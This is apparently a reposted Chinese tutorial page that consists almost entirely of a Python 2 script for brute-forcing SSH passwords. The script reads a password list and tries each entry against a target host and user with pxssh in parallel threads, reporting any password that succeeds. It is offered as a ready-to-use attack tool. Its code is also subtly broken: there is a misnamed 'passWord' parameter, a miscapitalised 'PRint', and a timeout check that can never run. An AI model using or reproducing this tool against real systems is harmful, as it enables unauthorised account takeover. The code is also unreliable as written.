python+pxssh+ssh用户密码暴力破解

2/10/2017来源:ASP.NET技巧人气:1612

from pexpect import pxssh
import optparse
import time
from threading import *
maxConnections=5
connection_lock=BoundedSemaphore(value=maxConnections)
Found=False
Fails=0
def connect(host,user,passWord,release):
	global Found 
	global Fails
	try:
		s=pxssh.pxssh()
		s.login(host,user,password)
		PRint '[+]Password Found:'+password
		Found=True
	except Exception,e:
		if 'read_nonblocking' in str(e):
			Fails+=1
			time.sleep(5)
			connect(host,user,password,False)
		elif 'synchronize with original prompt' in str(e):
			time.sleep(1)
			connect(host,user,password,False)
	finally:
		if release:
			connection_lock.release()
def main():
	parser=optparse.OptionParser('usage %prog -H <target host> -u <user> -F <password list>')
	parser.add_option('-H',dest='tgtHost',type='string')
	parser.add_option('-u',dest='user',type='string')
	parser.add_option('-F',dest='passwords',type='string')
	(options, args)=parser.parse_args()
	host=options.tgtHost
	user=options.user
	passwords=options.passwords
	if host==None or user==None or passwords==None:
		print parser.usage
		exit(0)
	fn=open(passwords,'r')
	for line in fn.readlines():
		if Found:
			print '[*]Exiting: Password Found'
			exit(0)
			if Fails>5:
				print '[!]Exiting:Too many Socket Timeouts'
				exit(0)
		connection_lock.acquire()
		psw=line.strip('\r').strip('\n')
		print "[-] Testing :" +str(psw)
		t=Thread(target=connect, args=(host,user,psw,True))
		child=t.start()
if __name__=='__main__':
	main()